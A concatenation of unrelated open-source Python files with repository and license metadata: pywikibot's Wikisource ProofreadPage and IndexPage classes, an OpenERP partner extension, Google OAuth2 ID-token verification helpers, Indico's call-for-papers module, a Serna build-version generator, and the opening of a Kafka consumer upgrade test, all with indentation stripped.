what_links_here.remove(page)
self._index = (page, what_links_here)
break
page, others = self._index
if others:
pywikibot.warning('%s linked to several Index pages.' % self)
pywikibot.output('{0}{1!s}'.format(' ' * 9, [page] + others))
if page:
pywikibot.output('{0}Selected Index: {1}'.format(' ' * 9, page))
pywikibot.output('{0}remaining: {1!s}'.format(' ' * 9, others))
if not page:
pywikibot.warning('Page %s is not linked to any Index page.'
% self)
return page
@index.setter
def index(self, value):
if not isinstance(value, IndexPage):
raise TypeError('value %s must be a IndexPage object.'
% value)
self._index = (value, None)
@index.deleter
def index(self):
if hasattr(self, "_index"):
del self._index
@property
def quality_level(self):
"""Return the quality level of this page when it is retrieved from API.
This is only applicable if contentmodel equals 'proofread-page'.
None is returned otherwise.
This property is read-only and is applicable only when page is loaded.
If quality level is overwritten during page processing, this property
is no longer necessarily aligned with the new value.
In this way, no text parsing is necessary to check quality level when
fetching a page.
# TODO: align this value with ProofreadPage.ql
"""
if self.content_model == 'proofread-page' and hasattr(self, '_quality'):
return self._quality
return self.ql
def decompose(fn): # flake8: disable=N805
"""Decorator.
Decompose text if needed and recompose text.
"""
def wrapper(obj, *args, **kwargs):
if not hasattr(obj, '_full_header'):
obj._decompose_page()
_res = fn(obj, *args, **kwargs)
obj._compose_page()
return _res
return wrapper
@property
@decompose
def ql(self):
"""Return page quality level."""
return self._full_header.ql
@ql.setter
@decompose
def ql(self, value):
"""Set page quality level."""
if value not in self.site.proofread_levels:
raise ValueError('Not valid QL value: %s (legal values: %s)'
% (value, self.site.proofread_levels))
# TODO: add logic to validate ql value change, considering
# site.proofread_levels.
self._full_header.ql = value
@property
@decompose
def user(self):
"""Return user in page header."""
return self._full_header.user
@user.setter
@decompose
def user(self, value):
"""Set user in page header."""
self._full_header.user = value
@property
@decompose
def status(self):
"""Return Proofread Page status."""
try:
return self.site.proofread_levels[self.ql]
except KeyError:
pywikibot.warning('Not valid status set for %s: quality level = %s'
% (self.title(asLink=True), self.ql))
return None
def without_text(self):
"""Set Page QL to "Without text"."""
self.ql = self.WITHOUT_TEXT
def problematic(self):
"""Set Page QL to "Problematic"."""
self.ql = self.PROBLEMATIC
def not_proofread(self):
"""Set Page QL to "Not Proofread"."""
self.ql = self.NOT_PROOFREAD
def proofread(self):
"""Set Page QL to "Proofread"."""
# TODO: check should be made to be consistent with Proofread Extension
self.ql = self.PROOFREAD
def validate(self):
"""Set Page QL to "Validated"."""
# TODO: check should be made to be consistent with Proofread Extension
self.ql = self.VALIDATED
@property
@decompose
def header(self):
"""Return editable part of Page header."""
return self._full_header.header
@header.setter
@decompose
def header(self, value):
"""Set editable part of Page header."""
self._full_header.header = value
@property
@decompose
def body(self):
"""Return Page body."""
return self._body
@body.setter
@decompose
def body(self, value):
"""Set Page body."""
self._body = value
@property
@decompose
def footer(self):
"""Return Page footer."""
return self._footer
@footer.setter
@decompose
def footer(self, value):
"""Set Page footer."""
self._footer = value
def _create_empty_page(self):
"""Create empty page."""
self._full_header = FullHeader()
self._body = ''
self._footer = ''
self.user = self.site.username() # Fill user field in empty header.
self._compose_page()
@property
def text(self):
"""Override text property.
Preload text returned by EditFormPreloadText to preload non-existing
pages.
"""
# Text is already cached.
if hasattr(self, '_text'):
return self._text
# If page does not exist, preload it.
if self.exists():
# If page exists, load it.
super(ProofreadPage, self).text
else:
self._text = self.preloadText()
self.user = self.site.username() # Fill user field in empty header.
return self._text
@text.setter
def text(self, value):
"""Update current text.
Mainly for use within the class, called by other methods.
Use self.header, self.body and self.footer to set page content,
@param value: New value or None
@param value: basestring
@raise Error: the page is not formatted according to ProofreadPage
extension.
"""
self._text = value
if self._text:
self._decompose_page()
else:
self._create_empty_page()
@text.deleter
def text(self):
"""Delete current text."""
if hasattr(self, '_text'):
del self._text
def _decompose_page(self):
"""Split Proofread Page text in header, body and footer.
@raise Error: the page is not formatted according to ProofreadPage
extension.
"""
# Property force page text loading.
if not (hasattr(self, '_text') or self.text):
self._create_empty_page()
return
open_queue = list(self.p_open.finditer(self._text))
close_queue = list(self.p_close.finditer(self._text))
len_oq = len(open_queue)
len_cq = len(close_queue)
if (len_oq != len_cq) or (len_oq < 2 or len_cq < 2):
raise pywikibot.Error('ProofreadPage %s: invalid format'
% self.title(asLink=True))
f_open, f_close = open_queue[0], close_queue[0]
self._full_header = FullHeader(self._text[f_open.end():f_close.start()])
l_open, l_close = open_queue[-1], close_queue[-1]
self._footer = self._text[l_open.end():l_close.start()]
self._body = self._text[f_close.end():l_open.start()]
def _compose_page(self):
"""Compose Proofread Page text from header, body and footer."""
self._text = self._fmt.format(self)
return self._text
def _page_to_json(self):
"""Convert page text to json format.
This is the format accepted by action=edit specifying
contentformat=application/json. This format is recommended to save the
page, as it is not subject to possible errors done in composing the
wikitext header and footer of the page or changes in the ProofreadPage
extension format.
"""
page_dict = {'header': self.header,
'body': self.body,
'footer': self.footer,
'level': {'level': self.ql, 'user': self.user},
}
# Ensure_ascii=False returns a unicode.
return json.dumps(page_dict, ensure_ascii=False)
def save(self, *args, **kwargs): # See Page.save().
"""Save page content after recomposing the page."""
summary = kwargs.pop('summary', '')
summary = self.pre_summary + summary
# Save using contentformat='application/json'.
kwargs['contentformat'] = 'application/json'
kwargs['contentmodel'] = 'proofread-page'
text = self._page_to_json()
super(ProofreadPage, self).save(*args, text=text, summary=summary,
**kwargs)
@property
def pre_summary(self):
"""Return trailing part of edit summary.
The edit summary shall be appended to pre_summary to highlight
Status in the edit summary on wiki.
"""
return '/* {0.status} */ '.format(self)
@property
def url_image(self):
"""Get the file url of the scan of ProofreadPage.
@return: file url of the scan ProofreadPage or None.
@rtype: str/unicode
@raises:
- Exception in case of http errors.
"""
# wrong link fail with various possible Exceptions.
if not hasattr(self, '_url_image'):
if self.exists():
url = self.full_url()
else:
path = 'w/index.php?title={0}&action=edit&redlink=1'
url = self.site.base_url(path.format(self.title(asUrl=True)))
try:
response = http.fetch(url, charset='utf-8')
except Exception:
pywikibot.error('Error fetching HTML for %s.' % self)
raise
soup = Soup(response.content)
try:
# None if nothing is found by .find()
self._url_image = soup.find(class_='prp-page-image')
self._url_image = self._url_image.find('img')
# if None raises TypeError.
self._url_image = self._url_image['src']
except TypeError:
raise ValueError('No prp-page-image src found for %s.' % self)
else:
self._url_image = 'https:' + self._url_image
return self._url_image
def _ocr_callback(self, cmd_uri, parser_func=None):
"""OCR callback function.
@return: tuple (error, text [error description in case of error]).
"""
def id(x):
return x
if not cmd_uri:
raise ValueError('Parameter cmd_uri is mandatory.')
if parser_func is None:
parser_func = id
if not callable(parser_func):
raise TypeError('Keyword parser_func must be callable.')
# wrong link fail with Exceptions
try:
response = http.fetch(cmd_uri, charset='utf-8')
except Exception as e:
pywikibot.error('Querying %s: %s' % (cmd_uri, e))
return (True, e)
data = json.loads(response.content)
assert 'error' in data, 'Error from phe-tools: %s' % data
assert data['error'] in [0, 1], 'Error from phe-tools: %s' % data
error = bool(data['error'])
if error:
pywikibot.error('Querying %s: %s' % (cmd_uri, data['text']))
return (error, data['text'])
else:
return (error, parser_func(data['text']))
def _do_hocr(self):
"""Do hocr using //tools.wmflabs.org/phetools/hocr_cgi.py?cmd=hocr."""
def parse_hocr_text(txt):
"""Parse hocr text."""
soup = Soup(txt)
res = []
for ocr_page in soup.find_all(class_='ocr_page'):
for area in soup.find_all(class_='ocr_carea'):
for par in area.find_all(class_='ocr_par'):
for line in par.find_all(class_='ocr_line'):
res.append(line.get_text())
res.append('\n')
return ''.join(res)
params = {'book': self.title(asUrl=True, withNamespace=False),
'lang': self.site.lang,
'user': self.site.user(),
}
cmd_uri = self.HOCR_CMD.format(**params)
return self._ocr_callback(cmd_uri, parser_func=parse_hocr_text)
def _do_ocr(self):
"""Do ocr using //tools.wmflabs.org/phetools/ocr.pmp?cmd=ocr."""
try:
url_image = self.url_image
except ValueError:
error_text = 'No prp-page-image src found for %s.' % self
pywikibot.error(error_text)
return (True, error_text)
params = {'url_image': url_image,
'lang': self.site.lang,
'user': self.site.user(),
}
cmd_uri = self.OCR_CMD.format(**params)
return self._ocr_callback(cmd_uri)
def ocr(self):
"""Do OCR of Proofreadpage scan.
The text returned by this function shalle be assign to self.body,
otherwise the ProofreadPage format will not be maintained.
It is the user's responsibility to reset quality level accordingly.
"""
if self._multi_page:
error, text = self._do_hocr()
if not error:
return text
error, text = self._do_ocr()
if not error:
return text
else:
raise ValueError('Not possible to perform HOCR/OCR on %s.' % self)
class PurgeRequest(Request):
"""Subclass of Request which skips the check on write rights.
Workaround for T128994.
# TODO: remove once bug is fixed.
"""
def __init__(self, **kwargs):
"""Monkeypatch action in Request constructor."""
action = kwargs['parameters']['action']
kwargs['parameters']['action'] = 'dummy'
super(PurgeRequest, self).__init__(**kwargs)
self.action = action
self.update({'action': action})
class IndexPage(pywikibot.Page):
"""Index Page page used in Mediawiki ProofreadPage extension."""
def __init__(self, source, title=''):
"""Instantiate a IndexPage object.
In this class:
page number is the number in the page title in the Page namespace, if
the wikisource site adopts this convention (e.g. page_number is 12
for Page:Popular Science Monthly Volume 1.djvu/12) or the sequential
number of the pages linked from the index section in the Index page
if the index is built via transclusion of a list of pages (e.g. like
on de wikisource).
page label is the label associated with a page in the Index page.
This class provides methods to get pages contained in Index page,
and relative page numbers and labels by means of several helper
functions.
It also provides a generator to pages contained in Index page, with
possibility to define range, filter by quality levels and page
existence.
@raise UnknownExtension: source Site has no ProofreadPage Extension.
@raise ImportError: bs4 is not installed.
"""
# Check if BeautifulSoup is imported.
if isinstance(BeautifulSoup, ImportError):
raise BeautifulSoup
if not isinstance(source, pywikibot.site.BaseSite):
site = source.site
else:
site = source
super(IndexPage, self).__init__(source, title)
if self.namespace() != site.proofread_index_ns:
raise ValueError('Page %s must belong to %s namespace'
% (self.title(), site.proofread_index_ns))
self._all_page_links = set(
self.site.pagelinks(self, namespaces=site.proofread_page_ns))
self._cached = False
def check_if_cached(fn): # flake8: disable=N805
"""Decorator to check if data are cached and cache them if needed."""
def wrapper(self, *args, **kwargs):
if self._cached is False:
self._get_page_mappings()
return fn(self, *args, **kwargs)
return wrapper
def _parse_redlink(self, href):
"""Parse page title when link in Index is a redlink."""
p_href = re.compile(r'/w/index\.php\?title=(.+?)&action=edit&redlink=1')
title = p_href.search(href)
if title:
return title.group(1)
else:
return None
def purge(self):
"""Overwrite purge method.
Workaround for T128994.
# TODO: remove once bug is fixed.
Instead of a proper purge action, use PurgeRequest, which
skips the check on write rights.
"""
params = {'action': 'purge', 'titles': [self.title()]}
request = PurgeRequest(site=self.site, parameters=params)
rawdata = request.submit()
error_message = 'Purge action failed for %s' % self
assert 'purge' in rawdata, error_message
assert 'purged' in rawdata['purge'][0], error_message
def _get_page_mappings(self):
"""Associate label and number for each page linked to the index."""
# Clean cache, if any.
self._page_from_numbers = {}
self._numbers_from_page = {}
self._page_numbers_from_label = {}
self._pages_from_label = {}
self._labels_from_page_number = {}
self._labels_from_page = {}
if hasattr(self, '_parsed_text'):
del self._parsed_text
self._parsed_text = self._get_parsed_page()
self._soup = Soup(self._parsed_text)
# Do not search for "new" here, to avoid to skip purging if links
# to non-existing pages are present.
attrs = {'class': re.compile('prp-pagequality')}
# Search for attribute "prp-pagequality" in tags:
# Existing pages:
# <a href="/wiki/Page:xxx.djvu/n"
# title="Page:xxx.djvu/n">m
# class="quality1 prp-pagequality-1"
# </a>
# Non-existing pages:
# <a href="/w/index.php?title=xxx&action=edit&redlink=1"
# class="new"
# title="Page:xxx.djvu/n (page does not exist)">m
# </a>
# Try to purge or raise ValueError.
if not self._soup.find_all('a', attrs=attrs):
self.purge()
del self._parsed_text
self._parsed_text = self._get_parsed_page()
self._soup = Soup(self._parsed_text)
if not self._soup.find_all('a', attrs=attrs):
raise ValueError(
'Missing class="qualityN prp-pagequality-N" or '
'class="new" in: %s.'
% self)
# Search for attribute "prp-pagequality" or "new" in tags:
attrs = {'class': re.compile('prp-pagequality|new')}
page_cnt = 0
for a_tag in self._soup.find_all('a', attrs=attrs):
label = a_tag.text.lstrip('0') # Label is not converted to int.
class_ = a_tag.get('class')
href = a_tag.get('href')
if 'new' in class_:
title = self._parse_redlink(href) # non-existing page
if title is None: # title not conforming to required format
continue
else:
title = a_tag.get('title') # existing page
try:
page = ProofreadPage(self.site, title)
page.index = self # set index property for page
page_cnt += 1
except ValueError:
# title is not in site.proofread_page_ns; do not consider it
continue
if page not in self._all_page_links:
raise pywikibot.Error('Page %s not recognised.' % page)
# In order to avoid to fetch other Page:title links outside
# the Pages section of the Index page; these should hopefully be
# the first ones, so if they start repeating, we are done.
if page in self._labels_from_page:
break
# Sanity check if WS site use page convention name/number.
if page._num is not None:
assert page_cnt == int(page._num), (
'Page number %s not recognised as page %s.'
% (page_cnt, title))
# Mapping: numbers <-> pages.
self._page_from_numbers[page_cnt] = page
self._numbers_from_page[page] = page_cnt
# Mapping: numbers/pages as keys, labels as values.
self._labels_from_page_number[page_cnt] = label
self._labels_from_page[page] = label
# Reverse mapping: labels as keys, numbers/pages as values.
self._page_numbers_from_label.setdefault(label, set()).add(page_cnt)
self._pages_from_label.setdefault(label, set()).add(page)
# Sanity check: all links to Page: ns must have been considered.
assert set(self._labels_from_page) == set(self._all_page_links)
# Info cached.
self._cached = True
@property
@check_if_cached
def num_pages(self):
"""Return total number of pages in Index.
@return: total number of pages in Index
@rtype: int
"""
return len(self._page_from_numbers)
def page_gen(self, start=1, end=None, filter_ql=None,
only_existing=False, content=True):
"""Return a page generator which yields pages contained in Index page.
Range is [start ... end], extremes included.
@param start: first page, defaults to 1
@type start: int
@param end: num_pages if end is None
@type end: int
@param filter_ql: filters quality levels
if None: all but 'Without Text'.
@type filter_ql: list of ints (corresponding to ql constants
defined in ProofreadPage).
@param only_existing: yields only existing pages.
@type only_existing: bool
@param content: preload content.
@type content: bool
"""
if end is None:
end = self.num_pages
if not ((1 <= start <= self.num_pages) and
(1 <= end <= self.num_pages) and
(start <= end)):
raise ValueError('start=%s, end=%s are not in valid range (%s, %s)'
% (start, end, 1, self.num_pages))
# All but 'Without Text'
if filter_ql is None:
filter_ql = list(self.site.proofread_levels.keys())
filter_ql.remove(ProofreadPage.WITHOUT_TEXT)
gen = (self.get_page(i) for i in range(start, end + 1))
if content:
gen = self.site.preloadpages(gen)
# Decorate and sort by page number because preloadpages does not
# guarantee order.
# TODO: remove if preloadpages will guarantee order.
gen = ((p, self.get_number(p)) for p in gen)
gen = (p[0] for p in sorted(gen, key=lambda x: x[1]))
# Filter by QL.
gen = (p for p in gen if p.ql in filter_ql)
# Yield only existing.
if only_existing:
gen = (p for p in gen if p.exists())
return gen
@check_if_cached
def get_label_from_page(self, page):
"""Return 'page label' for page.
There is a 1-to-1 correspondence (each page has a label).
@param page: Page instance
@return: page label
@rtype: unicode string
"""
try:
return self._labels_from_page[page]
except KeyError:
raise KeyError('Invalid Page: %s.' % page)
@check_if_cached
def get_label_from_page_number(self, page_number):
"""Return page label from page number.
There is a 1-to-1 correspondence (each page has a label).
@param page_number: int
@return: page label
@rtype: unicode string
"""
try:
return self._labels_from_page_number[page_number]
except KeyError:
raise KeyError('Page number ".../%s" not in range.'
% page_number)
def _get_from_label(self, mapping_dict, label):
"""Helper function to get info from label."""
# Convert label to string if an integer is passed.
if isinstance(label, int):
label = str(label)
try:
return mapping_dict[label]
except KeyError:
raise KeyError('No page has label: "%s".' % label)
@check_if_cached
def get_page_number_from_label(self, label='1'):
"""Return page number from page label.
There is a 1-to-many correspondence (a label can be the same for
several pages).
@return: set containing page numbers corresponding to page label.
"""
return self._get_from_label(self._page_numbers_from_label, label)
@check_if_cached
def get_page_from_label(self, label='1'):
"""Return page number from page label.
There is a 1-to-many correspondence (a label can be the same for
several pages).
@return: set containing pages corresponding to page label.
"""
return self._get_from_label(self._pages_from_label, label)
@check_if_cached
def get_page(self, page_number):
"""Return a page object from page number."""
try:
return self._page_from_numbers[page_number]
except KeyError:
raise KeyError('Invalid page number: %s.' % page_number)
@check_if_cached
def pages(self):
"""Return the list of pages in Index, sorted by page number.
@return: list of pages
@rtype: list
"""
return [self._page_from_numbers[i] for i in range(1, self.num_pages + 1)]
@check_if_cached
def get_number(self, page):
"""Return a page number from page object."""
try:
return self._numbers_from_page[page]
except KeyError:
raise KeyError('Invalid page: %s.' % page)
| mit |
CloudWareChile/OpenChile | openerp/addons/event/res_partner.py | 9 | 1403 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from osv import fields, osv
class res_partner(osv.osv):
_inherit = 'res.partner'
_columns = {
'speaker': fields.boolean('Speaker'),
'event_ids': fields.one2many('event.event','main_speaker_id', readonly=True),
'event_registration_ids': fields.one2many('event.registration','partner_id', readonly=True),
}
res_partner()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: | agpl-3.0 |
gnmiller/craig-bot | craig-bot/lib/python3.6/site-packages/google/oauth2/id_token.py | 12 | 5590 | # Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Google ID Token helpers.
Provides support for verifying `OpenID Connect ID Tokens`_, especially ones
generated by Google infrastructure.
To parse and verify an ID Token issued by Google's OAuth 2.0 authorization
server use :func:`verify_oauth2_token`. To verify an ID Token issued by
Firebase, use :func:`verify_firebase_token`.
A general purpose ID Token verifier is available as :func:`verify_token`.
Example::
from google.oauth2 import id_token
from google.auth.transport import requests
request = requests.Request()
id_info = id_token.verify_oauth2_token(
token, request, 'my-client-id.example.com')
if id_info['iss'] != 'https://accounts.google.com':
raise ValueError('Wrong issuer.')
userid = id_info['sub']
By default, this will re-fetch certificates for each verification. Because
Google's public keys are only changed infrequently (on the order of once per
day), you may wish to take advantage of caching to reduce latency and the
potential for network errors. This can be accomplished using an external
library like `CacheControl`_ to create a cache-aware
:class:`google.auth.transport.Request`::
import cachecontrol
import google.auth.transport.requests
import requests
session = requests.session()
cached_session = cachecontrol.CacheControl(session)
request = google.auth.transport.requests.Request(session=cached_session)
.. _OpenID Connect ID Token:
http://openid.net/specs/openid-connect-core-1_0.html#IDToken
.. _CacheControl: https://cachecontrol.readthedocs.io
"""
import json
from six.moves import http_client
from google.auth import exceptions
from google.auth import jwt
# The URL that provides public certificates for verifying ID tokens issued
# by Google's OAuth 2.0 authorization server.
_GOOGLE_OAUTH2_CERTS_URL = 'https://www.googleapis.com/oauth2/v1/certs'
# The URL that provides public certificates for verifying ID tokens issued
# by Firebase and the Google APIs infrastructure
_GOOGLE_APIS_CERTS_URL = (
'https://www.googleapis.com/robot/v1/metadata/x509'
'/securetoken@system.gserviceaccount.com')
def _fetch_certs(request, certs_url):
"""Fetches certificates.
Google-style cerificate endpoints return JSON in the format of
``{'key id': 'x509 certificate'}``.
Args:
request (google.auth.transport.Request): The object used to make
HTTP requests.
certs_url (str): The certificate endpoint URL.
Returns:
Mapping[str, str]: A mapping of public key ID to x.509 certificate
data.
"""
response = request(certs_url, method='GET')
if response.status != http_client.OK:
raise exceptions.TransportError(
'Could not fetch certificates at {}'.format(certs_url))
return json.loads(response.data.decode('utf-8'))
def verify_token(id_token, request, audience=None,
certs_url=_GOOGLE_OAUTH2_CERTS_URL):
"""Verifies an ID token and returns the decoded token.
Args:
id_token (Union[str, bytes]): The encoded token.
request (google.auth.transport.Request): The object used to make
HTTP requests.
audience (str): The audience that this token is intended for. If None
then the audience is not verified.
certs_url (str): The URL that specifies the certificates to use to
verify the token. This URL should return JSON in the format of
``{'key id': 'x509 certificate'}``.
Returns:
Mapping[str, Any]: The decoded token.
"""
certs = _fetch_certs(request, certs_url)
return jwt.decode(id_token, certs=certs, audience=audience)
def verify_oauth2_token(id_token, request, audience=None):
"""Verifies an ID Token issued by Google's OAuth 2.0 authorization server.
Args:
id_token (Union[str, bytes]): The encoded token.
request (google.auth.transport.Request): The object used to make
HTTP requests.
audience (str): The audience that this token is intended for. This is
typically your application's OAuth 2.0 client ID. If None then the
audience is not verified.
Returns:
Mapping[str, Any]: The decoded token.
"""
return verify_token(
id_token, request, audience=audience,
certs_url=_GOOGLE_OAUTH2_CERTS_URL)
def verify_firebase_token(id_token, request, audience=None):
"""Verifies an ID Token issued by Firebase Authentication.
Args:
id_token (Union[str, bytes]): The encoded token.
request (google.auth.transport.Request): The object used to make
HTTP requests.
audience (str): The audience that this token is intended for. This is
typically your Firebase application ID. If None then the audience
is not verified.
Returns:
Mapping[str, Any]: The decoded token.
"""
return verify_token(
id_token, request, audience=audience, certs_url=_GOOGLE_APIS_CERTS_URL)
| mit |
nop33/indico | indico/modules/events/papers/__init__.py | 2 | 4743 | # This file is part of Indico.
# Copyright (C) 2002 - 2017 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from flask import session
from indico.core import signals
from indico.core.logger import Logger
from indico.core.roles import ManagementRole
from indico.modules.events.features.base import EventFeature
from indico.modules.events.models.events import Event, EventType
from indico.util.i18n import _
from indico.web.flask.util import url_for
from indico.web.menu import SideMenuItem
logger = Logger.get('events.papers')
@signals.menu.items.connect_via('event-management-sidemenu')
def _extend_event_management_menu(sender, event, **kwargs):
if not event.cfp.is_manager(session.user) or not PapersFeature.is_allowed_for_event(event):
return
return SideMenuItem('papers', _('Call for Papers'), url_for('papers.management', event),
section='organization')
@signals.event_management.management_url.connect
def _get_event_management_url(event, **kwargs):
if event.cfp.is_manager(session.user):
return url_for('papers.management', event)
@signals.event.get_feature_definitions.connect
def _get_feature_definitions(sender, **kwargs):
return PapersFeature
@signals.acl.get_management_roles.connect_via(Event)
def _get_management_roles(sender, **kwargs):
yield PaperManagerRole
yield PaperJudgeRole
yield PaperContentReviewerRole
yield PaperLayoutReviewerRole
class PapersFeature(EventFeature):
name = 'papers'
friendly_name = _('Call for Papers')
description = _('Gives event managers the opportunity to open a "Call for Papers" and use the paper '
'reviewing workflow.')
@classmethod
def is_allowed_for_event(cls, event):
return event.type_ == EventType.conference
class PaperManagerRole(ManagementRole):
name = 'paper_manager'
friendly_name = _('Paper Manager')
description = _('Grants management rights for paper reviewing on an event.')
class PaperJudgeRole(ManagementRole):
name = 'paper_judge'
friendly_name = _('Judge')
description = _('Grants paper judgment rights for assigned papers.')
class PaperContentReviewerRole(ManagementRole):
name = 'paper_content_reviewer'
friendly_name = _('Content reviewer')
description = _('Grants content reviewing rights for assigned papers.')
class PaperLayoutReviewerRole(ManagementRole):
name = 'paper_layout_reviewer'
friendly_name = _('Layout reviewer')
description = _('Grants layout reviewing rights for assigned papers.')
@signals.event.sidemenu.connect
def _extend_event_menu(sender, **kwargs):
from indico.modules.events.layout.util import MenuEntryData
def _judging_area_visible(event):
if not session.user or not event.has_feature('papers'):
return False
return event.cfp.can_access_judging_area(session.user)
def _reviewing_area_visible(event):
if not session.user or not event.has_feature('papers'):
return False
return event.cfp.can_access_reviewing_area(session.user)
def _call_for_papers_visible(event):
from indico.modules.events.papers.util import has_contributions_with_user_paper_submission_rights
if not session.user or not event.has_feature('papers'):
return False
return (has_contributions_with_user_paper_submission_rights(event, session.user) or
event.cfp.is_staff(session.user))
yield MenuEntryData(title=_("Call for Papers"), name='call_for_papers',
endpoint='papers.call_for_papers', position=8,
visible=_call_for_papers_visible)
yield MenuEntryData(title=_("Reviewing Area"), name='paper_reviewing_area', parent='call_for_papers',
endpoint='papers.reviewing_area', position=0, visible=_reviewing_area_visible)
yield MenuEntryData(title=_("Judging Area"), name='paper_judging_area', parent='call_for_papers',
endpoint='papers.papers_list', position=1, visible=_judging_area_visible)
| gpl-3.0 |
pantonov/serna-free | tools/buildsys/buildver.py | 5 | 4025 | ##
## Copyright(c) 2009 Syntext, Inc. All Rights Reserved.
## Contact: info@syntext.com, http://www.syntext.com
##
## This file is part of Syntext Serna XML Editor.
##
## COMMERCIAL USAGE
## Licensees holding valid Syntext Serna commercial licenses may use this file
## in accordance with the Syntext Serna Commercial License Agreement provided
## with the software, or, alternatively, in accorance with the terms contained
## in a written agreement between you and Syntext, Inc.
##
## GNU GENERAL PUBLIC LICENSE USAGE
## Alternatively, this file may be used under the terms of the GNU General
## Public License versions 2.0 or 3.0 as published by the Free Software
## Foundation and appearing in the file LICENSE.GPL included in the packaging
## of this file. In addition, as a special exception, Syntext, Inc. gives you
## certain additional rights, which are described in the Syntext, Inc. GPL
## Exception for Syntext Serna Free Edition, included in the file
## GPL_EXCEPTION.txt in this package.
##
## You should have received a copy of appropriate licenses along with this
## package. If not, see <http://www.syntext.com/legal/>. If you are unsure
## which license is appropriate for your use, please contact the sales
## department at sales@syntext.com.
##
## This file is provided AS IS with NO WARRANTY OF ANY KIND, INCLUDING THE
## WARRANTY OF DESIGN, MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
##
import sys, time, os
if len(sys.argv) < 7:
print >> sys.stderr,"\nUsage: buildver.py <gen_file> <ver_file>",
print >> sys.stderr, "<module_name> <product_name> <major> <minor> <patch>\n"
sys.exit(1)
buildver, ver_file, module_name, product_name, major, minor, patch = sys.argv[1:8]
class BuildVer:
def __init__(self, buildver, ver_file, module_name, product_name, major, minor, patch):
self.buildver_ = buildver
self.module_name_ = module_name
self.product_name_ = product_name
self.major_, self.minor_, self.patch_ = major, minor, patch
self.basename_, ext = os.path.splitext(self.buildver_)
self.text_patch_ = '0'
try:
for line in open(ver_file):
line = line.strip()
if line[0] != '#':
self.major_, self.minor_, self.text_patch_ = line.split('.', 2)
break
except:
pass
if "darwin" == sys.platform:
self.extern_ = '__attribute__((visibility("hidden"))) extern'
else:
self.extern_ = 'extern'
self.builddate_ = time.strftime("%Y%m%d")
def dump_hpp(self):
if self.module_name_ and self.product_name_ and self.major_ and self.minor_ and self.patch_:
fobj = open(self.basename_ + ".hpp", "w+")
print >> fobj, """#ifndef _VERSION_H\n#define _VERSION_H\n
# define MODULE_NAME \t\t"%(module_name_)s"
# define MODULE_PRODUCT_NAME \t"%(product_name_)s"\n
# define VERSION_MAJOR\t\t%(major_)s
# define VERSION_MINOR\t\t%(minor_)s
# define VERSION_PATCH\t\t%(patch_)s
# define BUILD_DATE\t\t%(builddate_)s
#ifndef RC_INVOKED\n
%(extern_)s const char buildver[];
%(extern_)s const char builddate[];\n
%(extern_)s const char modulename[];
%(extern_)s const char productname[];\n
#endif // RC_INVOKED"
#endif // _VERSION_H""" % self.__dict__
else:
sys.exit(1)
def dump_cpp(self):
if self.module_name_ and self.product_name_ and self.major_ and self.minor_ and self.patch_:
fobj = open(self.basename_ + ".cpp", "w+")
print >> fobj, """#include "buildver.hpp"\n
const char buildver[] = "%(major_)s.%(minor_)s.%(patch_)s";
const char builddate[] = "%(builddate_)s";
const char modulename[] = "%(module_name_)s";
const char productname[] = "%(product_name_)s";\n""" % self.__dict__
else:
sys.exit(1)
try:
bv = BuildVer(buildver, ver_file, module_name, product_name, major, minor, patch)
bv.dump_cpp()
bv.dump_hpp()
except:
sys.exit(2)
| gpl-3.0 |
richhaase/kafka | tests/kafkatest/tests/client/consumer_rolling_upgrade_test.py | 23 | 4200 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ducktape.mark.resource import cluster
from kafkatest.tests.verifiable_consumer_test import VerifiableConsumerTest
from kafkatest.services.kafka import TopicPartition
class ConsumerRollingUpgradeTest(VerifiableConsumerTest):
TOPIC = "test_topic"
NUM_PARTITIONS = 4
RANGE = "org.apache.kafka.clients.consumer.RangeAssignor"
ROUND_ROBIN = "org.apache.kafka.clients.consumer.RoundRobinAssignor"
def __init__(self, test_context):
super(ConsumerRollingUpgradeTest, self).__init__(test_context, num_consumers=2, num_producers=0,
num_zk=1, num_brokers=1, topics={
self.TOPIC : { 'partitions': self.NUM_PARTITIONS, 'replication-factor': 1 }
})
def _verify_range_assignment(self, consumer):
# range assignment should give us two partition sets: (0, 1) and (2, 3)
assignment = set([frozenset(partitions) for partitions in consumer.current_assignment().values()])
assert assignment == set([
frozenset([TopicPartition(self.TOPIC, 0), TopicPartition(self.TOPIC, 1)]),
